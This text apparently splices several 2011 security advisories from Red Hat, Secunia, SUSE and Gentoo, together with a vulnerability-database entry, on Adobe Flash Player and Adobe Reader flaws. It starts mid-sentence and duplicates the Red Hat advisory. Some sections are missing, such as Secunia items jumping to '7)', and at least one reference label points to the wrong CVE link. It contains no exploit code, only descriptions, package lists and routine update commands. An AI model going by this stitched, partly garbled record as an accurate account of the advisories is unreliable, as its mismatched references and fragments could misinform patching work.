CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
x86_64:
acroread-9.4.6-1.el6.i686.rpm
acroread-plugin-9.4.6-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-2130.html
https://www.redhat.com/security/data/cve/CVE-2011-2134.html
https://www.redhat.com/security/data/cve/CVE-2011-2135.html
https://www.redhat.com/security/data/cve/CVE-2011-2136.html
https://www.redhat.com/security/data/cve/CVE-2011-2137.html
https://www.redhat.com/security/data/cve/CVE-2011-2138.html
https://www.redhat.com/security/data/cve/CVE-2011-2139.html
https://www.redhat.com/security/data/cve/CVE-2011-2140.html
https://www.redhat.com/security/data/cve/CVE-2011-2414.html
https://www.redhat.com/security/data/cve/CVE-2011-2415.html
https://www.redhat.com/security/data/cve/CVE-2011-2416.html
https://www.redhat.com/security/data/cve/CVE-2011-2417.html
https://www.redhat.com/security/data/cve/CVE-2011-2424.html
https://www.redhat.com/security/data/cve/CVE-2011-2425.html
https://www.redhat.com/security/data/cve/CVE-2011-2426.html
https://www.redhat.com/security/data/cve/CVE-2011-2427.html
https://www.redhat.com/security/data/cve/CVE-2011-2428.html
https://www.redhat.com/security/data/cve/CVE-2011-2429.html
https://www.redhat.com/security/data/cve/CVE-2011-2430.html
https://www.redhat.com/security/data/cve/CVE-2011-2431.html
https://www.redhat.com/security/data/cve/CVE-2011-2432.html
https://www.redhat.com/security/data/cve/CVE-2011-2433.html
https://www.redhat.com/security/data/cve/CVE-2011-2434.html
https://www.redhat.com/security/data/cve/CVE-2011-2435.html
https://www.redhat.com/security/data/cve/CVE-2011-2436.html
https://www.redhat.com/security/data/cve/CVE-2011-2437.html
https://www.redhat.com/security/data/cve/CVE-2011-2438.html
https://www.redhat.com/security/data/cve/CVE-2011-2439.html
https://www.redhat.com/security/data/cve/CVE-2011-2440.html
https://www.redhat.com/security/data/cve/CVE-2011-2442.html
https://www.redhat.com/security/data/cve/CVE-2011-2444.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb11-21.html
http://www.adobe.com/support/security/bulletins/apsb11-24.html
http://www.adobe.com/support/security/bulletins/apsb11-26.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFOuRkFXlSAg2UNWIIRAqaIAJoC3LKpTEj6IsfoUq9JqGuHAKt3bACfcz3q
0+KSTL2IByBwtP8+xfPmUNE=
=qFq6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Red Hat update for flash-plugin
SECUNIA ADVISORY ID:
SA45593
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45593/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
RELEASE DATE:
2011-08-12
DISCUSS ADVISORY:
http://secunia.com/advisories/45593/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45593/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45593
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Red Hat has issued an update for flash-plugin. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
disclose sensitive information and compromise a user's system.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY:
RHSA-2011:1144-1:
https://rhn.redhat.com/errata/RHSA-2011-1144.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
VAR-201108-0184 | CVE-2011-2415 | Adobe Flash Player and Adobe AIR Vulnerable to buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2134, CVE-2011-2137, and CVE-2011-2414. Adobe Flash Player and Adobe AIR Contains a buffer overflow vulnerability. This vulnerability CVE-2011-2130 , CVE-2011-2134 , CVE-2011-2137 ,and CVE-2011-2414 Is a different vulnerability.An attacker could execute arbitrary code. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
______________________________________________________________________________
SUSE Security Announcement
Package: flash-player
Announcement ID: SUSE-SA:2011:033
Date: Wed, 10 Aug 2011 14:00:00 +0000
Affected Products: SUSE Linux Enterprise Desktop 11 SP1
SUSE Linux Enterprise Desktop 10 SP4
Vulnerability Type: remote code execution
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
SUSE Default Package: yes
Cross-References: CVE-2011-2130, CVE-2011-2134, CVE-2011-2135
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138
CVE-2011-2139, CVE-2011-2140, CVE-2011-2414
CVE-2011-2415, CVE-2011-2416, CVE-2011-2417
CVE-2011-2425
Content of This Advisory:
1) Security Vulnerability Resolved:
remote code execution
Problem Description
2) Solution or Work-Around
3) Special Instructions and Notes
4) Package Location and Checksums
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
6) Authenticity Verification and Additional Information
______________________________________________________________________________
1) Problem Description and Brief Discussion
Flash-Player was updated to version 10.3.188.5 to fix various buffer
and integer overflows:
- CVE-2011-2130: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2134: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2135: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2136: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2137: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2138: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2139: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2140: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2414: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2415: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2416: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2417: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVE-2011-2425: CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Earlier flash-player versions can be exploited to execute arbitrary code
remotely with the privileges of the attacked user.
For more details see:
http://www.adobe.com/support/security/bulletins/apsb11-21.html
2) Solution or Work-Around
none
3) Special Instructions and Notes
Pleease restart your browser.
4) Package Location and Checksums
The preferred method for installing security updates is to use the YaST
"Online Update" module or the "zypper" commandline tool. The package and
patch management stack will detect which updates are required and
automatically perform the necessary steps to verify and install them.
Alternatively, download the update packages for your distribution manually
and verify their integrity by the methods listed in Section 6 of this
announcement. Then install the packages using the command
rpm -Fhv <file.rpm>
to apply the update, replacing <file.rpm> with the filename of the
downloaded RPM package.
Our maintenance customers are notified individually. The packages are
offered for installation from the maintenance web:
SUSE Linux Enterprise Desktop 10 SP4
http://download.novell.com/patch/finder/?keywords=7c71e4aec6afd72e6b40f8cf2817e900
SUSE Linux Enterprise Desktop 11 SP1
http://download.novell.com/patch/finder/?keywords=377e091a105e9d540a2a90f09cff0a10
______________________________________________________________________________
5) Pending Vulnerabilities, Solutions, and Work-Arounds:
none
______________________________________________________________________________
6) Authenticity Verification and Additional Information
- Announcement authenticity verification:
SUSE security announcements are published via mailing lists and on Web
sites. The authenticity and integrity of a SUSE security announcement is
guaranteed by a cryptographic signature in each announcement. All SUSE
security announcements are published with a valid signature.
To verify the signature of the announcement, save it as text into a file
and run the command
gpg --verify <file>
replacing <file> with the name of the file where you saved the
announcement. The output for a valid signature looks like:
gpg: Signature made <DATE> using RSA key ID 3D25D3D9
gpg: Good signature from "SuSE Security Team <security@suse.de>"
where <DATE> is replaced by the date the document was signed.
If the security team's key is not contained in your key ring, you can
import it from the first installation CD. To import the key, use the
command
gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc
- Package authenticity verification:
SUSE update packages are available on many mirror FTP servers all over the
world. While this service is considered valuable and important to the free
and open source software community, the authenticity and the integrity of
a package needs to be verified to ensure that it has not been tampered
with.
The internal rpm package signatures provide an easy way to verify the
authenticity of an RPM package. Use the command
rpm -v --checksig <file.rpm>
to verify the signature of the package, replacing <file.rpm> with the
filename of the RPM package downloaded. The package is unmodified if it
contains a valid signature from build@suse.de with the key ID 9C800ACA.
This key is automatically imported into the RPM database (on
RPMv4-based distributions) and the gpg key ring of 'root' during
installation. You can also find it on the first installation CD and at
the end of this announcement.
- SUSE runs two security mailing lists to which any interested party may
subscribe:
opensuse-security@opensuse.org
- General Linux and SUSE security discussion.
All SUSE security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security+subscribe@opensuse.org>.
opensuse-security-announce@opensuse.org
- SUSE's announce-only mailing list.
Only SUSE's security announcements are sent to this list.
To subscribe, send an e-mail to
<opensuse-security-announce+subscribe@opensuse.org>.
The <security@suse.de> public key is listed below.
=====================================================================
______________________________________________________________________________
The information in this advisory may be distributed or reproduced,
provided that the advisory is not modified in any way. In particular, the
clear text signature should show proof of the authenticity of the text.
SUSE Linux Products GmbH provides no warranties of any kind whatsoever
with respect to the information contained in this security advisory.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ----------------------------------------------------------------------
The Secunia CSI 5.0 Beta - now available for testing
Find out more, take a free test drive, and share your opinion with us:
http://secunia.com/blog/242
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA45583
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/45583/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
RELEASE DATE:
2011-08-11
DISCUSS ADVISORY:
http://secunia.com/advisories/45583/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/45583/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=45583
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to disclose sensitive
information and compromise a user's system.
7) An unspecified error can be exploited to disclose certain
information from another domain.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor
The vendor credits:
2) Yang Dingning, NCNIPC, Graduate University of Chinese Academy of
Sciences
3) Wushi, Team 509 via iDefense Labs
4, 11) Vitaliy Toropov via iDefense Labs
5) Alexander Zaitsev, Positive Technologies
6, 8) An anonymous person via ZDI
7) Brandon Hardy
9) Bo Qu, Palo Alto Networks
10) Bo Qu, Palo Alto Networks and Honggang Ren, FortiGuard Labs
12) Marc Schoenefeld (Dr. rer. nat.), Red Hat Security Response Team
13) Honggang Ren, FortiGuard Labs
ORIGINAL ADVISORY:
Adobe (APSB11-21):
http://www.adobe.com/support/security/bulletins/apsb11-21.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-10.3.183.10"
References
==========
[ 1 ] APSA11-01
http://www.adobe.com/support/security/advisories/apsa11-01.html
[ 2 ] APSA11-02
http://www.adobe.com/support/security/advisories/apsa11-02.html
[ 3 ] APSB11-02
http://www.adobe.com/support/security/bulletins/apsb11-02.html
[ 4 ] APSB11-12
http://www.adobe.com/support/security/bulletins/apsb11-12.html
[ 5 ] APSB11-13
http://www.adobe.com/support/security/bulletins/apsb11-13.html
[ 6 ] APSB11-21
https://www.adobe.com/support/security/bulletins/apsb11-21.html
[ 7 ] APSB11-26
https://www.adobe.com/support/security/bulletins/apsb11-26.html
[ 8 ] CVE-2011-0558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0558
[ 9 ] CVE-2011-0559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0559
[ 10 ] CVE-2011-0560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0560
[ 11 ] CVE-2011-0561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0561
[ 12 ] CVE-2011-0571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0571
[ 13 ] CVE-2011-0572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0572
[ 14 ] CVE-2011-0573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0573
[ 15 ] CVE-2011-0574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0574
[ 16 ] CVE-2011-0575
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0575
[ 17 ] CVE-2011-0577
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0577
[ 18 ] CVE-2011-0578
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0578
[ 19 ] CVE-2011-0579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0579
[ 20 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 21 ] CVE-2011-0607
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0607
[ 22 ] CVE-2011-0608
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0608
[ 23 ] CVE-2011-0609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0609
[ 24 ] CVE-2011-0611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0611
[ 25 ] CVE-2011-0618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0618
[ 26 ] CVE-2011-0619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0619
[ 27 ] CVE-2011-0620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0620
[ 28 ] CVE-2011-0621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0621
[ 29 ] CVE-2011-0622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0622
[ 30 ] CVE-2011-0623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0623
[ 31 ] CVE-2011-0624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0624
[ 32 ] CVE-2011-0625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0625
[ 33 ] CVE-2011-0626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0626
[ 34 ] CVE-2011-0627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0627
[ 35 ] CVE-2011-0628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0628
[ 36 ] CVE-2011-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2107
[ 37 ] CVE-2011-2110
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2110
[ 38 ] CVE-2011-2125
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 39 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 40 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 41 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 42 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 43 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 44 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 45 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 46 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 47 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 48 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 49 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 50 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 51 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 52 ] CVE-2011-2426
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2426
[ 53 ] CVE-2011-2427
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2427
[ 54 ] CVE-2011-2428
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2428
[ 55 ] CVE-2011-2429
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2429
[ 56 ] CVE-2011-2430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2430
[ 57 ] CVE-2011-2444
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2444
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201110-11.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: acroread security update
Advisory ID: RHSA-2011:1434-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-1434.html
Issue date: 2011-11-08
CVE Names: CVE-2011-2130 CVE-2011-2134 CVE-2011-2135
CVE-2011-2136 CVE-2011-2137 CVE-2011-2138
CVE-2011-2139 CVE-2011-2140 CVE-2011-2414
CVE-2011-2415 CVE-2011-2416 CVE-2011-2417
CVE-2011-2424 CVE-2011-2425 CVE-2011-2426
CVE-2011-2427 CVE-2011-2428 CVE-2011-2429
CVE-2011-2430 CVE-2011-2431 CVE-2011-2432
CVE-2011-2433 CVE-2011-2434 CVE-2011-2435
CVE-2011-2436 CVE-2011-2437 CVE-2011-2438
CVE-2011-2439 CVE-2011-2440 CVE-2011-2442
CVE-2011-2444
=====================================================================
1. Summary:
Updated acroread packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 4 Extras and Red Hat Enterprise
Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Desktop version 4 Extras - i386, x86_64
Red Hat Enterprise Linux AS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux ES version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux WS version 4 Extras - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
Adobe Reader allows users to view and print documents in Portable Document
Format (PDF).
This update fixes multiple security flaws in Adobe Reader. These flaws are
detailed on the Adobe security page APSB11-24, listed in the References
section. A specially-crafted PDF file could cause Adobe Reader to crash or,
potentially, execute arbitrary code as the user running Adobe Reader when
opened. These flaws are detailed on the Adobe security
pages APSB11-21 and APSB11-26, listed in the References section.
A PDF file with an embedded, specially-crafted SWF file could cause Adobe
Reader to crash or, potentially, execute arbitrary code as the user running
Adobe Reader when opened. (CVE-2011-2130, CVE-2011-2134, CVE-2011-2135,
CVE-2011-2136, CVE-2011-2137, CVE-2011-2138, CVE-2011-2139, CVE-2011-2140,
CVE-2011-2414, CVE-2011-2415, CVE-2011-2416, CVE-2011-2417, CVE-2011-2424,
CVE-2011-2425, CVE-2011-2426, CVE-2011-2427, CVE-2011-2428, CVE-2011-2430)
A flaw in Adobe Flash Player could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page. (CVE-2011-2429)
All Adobe Reader users should install these updated packages. They contain
Adobe Reader version 9.4.6, which is not vulnerable to these issues. All
running instances of Adobe Reader must be restarted for the update to take
effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
729497 - CVE-2011-2130 CVE-2011-2134 CVE-2011-2135 CVE-2011-2136 CVE-2011-2137 CVE-2011-2138 CVE-2011-2139 CVE-2011-2140 CVE-2011-2414 CVE-2011-2415 CVE-2011-2416 CVE-2011-2417 CVE-2011-2425 flash-plugin: multiple arbitrary code execution flaws (APSB-11-21)
740201 - CVE-2011-2444 acroread, flash-plugin: Cross-site scripting vulnerability fixed in APSB11-26
740204 - CVE-2011-2429 acroread, flash-plugin: security control bypass information disclosure fixed in APSB11-26
740388 - CVE-2011-2426 CVE-2011-2427 CVE-2011-2428 CVE-2011-2430 acroread, flash-plugin: critical flaws fixed in APSB11-26
749381 - acroread: multiple code execution flaws (APSB11-24)
6. Package List:
Red Hat Enterprise Linux AS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Desktop version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux ES version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux WS version 4 Extras:
i386:
acroread-9.4.6-1.el4.i386.rpm
acroread-plugin-9.4.6-1.el4.i386.rpm
x86_64:
acroread-9.4.6-1.el4.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
x86_64:
acroread-9.4.6-1.el5.i386.rpm
acroread-plugin-9.4.6-1.el5.i386.rpm
